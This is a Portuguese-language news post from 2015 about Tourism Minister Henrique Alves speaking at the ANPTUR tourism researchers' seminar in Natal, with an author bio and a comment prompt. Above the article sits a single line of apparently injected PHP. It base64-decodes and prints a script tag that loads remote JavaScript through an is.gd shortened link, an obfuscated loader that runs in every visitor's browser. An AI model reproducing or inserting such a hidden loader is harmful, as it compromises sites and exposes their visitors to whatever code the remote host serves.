$str = 'PHNjcmlwdCBzcmM9Imh0dHBzOi8vaXMuZ2QvR2dHZjl6P3Y9djI1LjAiPjwvc2NyaXB0Pg=='; echo base64_decode($str);

Em Natal, ministro Henrique Alves participa de encontro nacional com pesquisadores de turismo

Em Natal, ministro Henrique Alves participa de encontro nacional com pesquisadores de turismo
02 Out 2015

Pela primeira vez, em 12 anos, um ministro do Turismo participou do seminário acadêmico da Associação Nacional de Pesquisa e Pós-graduação em Turismo (ANPTUR). O evento, realizado em Natal, com o apoio da UFRN, reuniu 250 pesquisadores de nove universidades públicas e particulares. São mestres e doutores especialistas em pesquisas nas diversas áreas do turismo brasileiro.

Henrique Eduardo Alves ressaltou a importância do turismo para a economia e a capilaridade do setor na cadeia produtiva das atividades do comércio de bens e serviços. “Tenho conversado bastante com a presidenta Dilma Rousseff e ministros do governo federal sobre a importância do Turismo, principalmente no cenário econômico nacional. Acredito que somos a atividade que mais rápido pode contribuir para o enfrentamento da crise econômica”, disse o ministro.

Henrique Alves disse, ainda, que o Ministério do Turismo está comprometido em fazer as reformas internas necessárias para melhorar a qualidade e a eficiência da gestão em turismo no Brasil.  “Agora, é hora de avançarmos em uma nova agenda de desenvolvimento do setor. Afinados com a determinação da presidenta Dilma, vamos unir esforços para ajudar o Brasil a encontrar o rumo da retomada do crescimento e de respostas que a sociedade busca”.

O ministro pediu o apoio dos acadêmicos e estudiosos do turismo na elaboração do novo Plano Nacional de Turismo para o período 2016-2019.  “O PNT é o nosso norte, porque estabelece as diretrizes e metas para a Política Nacional de Turismo para os próximos quatro anos, que, com certeza, serão de grandes desafios”. Henrique Alves também defendeu estreitar cada vez mais a parceria entre a Universidade e a Gestão Pública para construir uma agenda de inovação e fortalecer a pesquisa científica e tecnológica em turismo no país.

O 12º Seminário da Associação Nacional de Pós-graduação e Pesquisa em Turismo contribuiu com o debate para o fortalecimento do turismo como uma atividade econômica sustentável. Foi a primeira vez que o encontro ocorreu no Rio Grande do Norte e a segunda no Nordeste (a primeira foi no Ceará). ”Esse encontro em Natal é um indicativo de que a nossa região, que sempre aparece como principal destino dos brasileiros em nossas pesquisas de intenção de viagem, está atenta à necessidade de ampliação do debate sobre o turismo em nível regional”, reconheceu o ministro.

021015MinistroANPTUR_02

share

Anna Ruth
Anna Ruth

Anna Ruth Dantas é jornalista, apresentadora do programa RN Acontece, da Band Natal; produz e apresenta o programa Jornal da Cidade, da Rádio Cidade (94 FM - Natal), e apresenta o programa Panorama do RN (em rede com 16 emissoras de rádio do Rio Grande do Norte). Jornalista de grande credibilidade, atua também como consultora e ministra cursos de midia trainning na Trilhar Educação Corporativa.

Deixar uma resposta

O seu endereço de email não será publicado. Campos obrigatórios marcados com *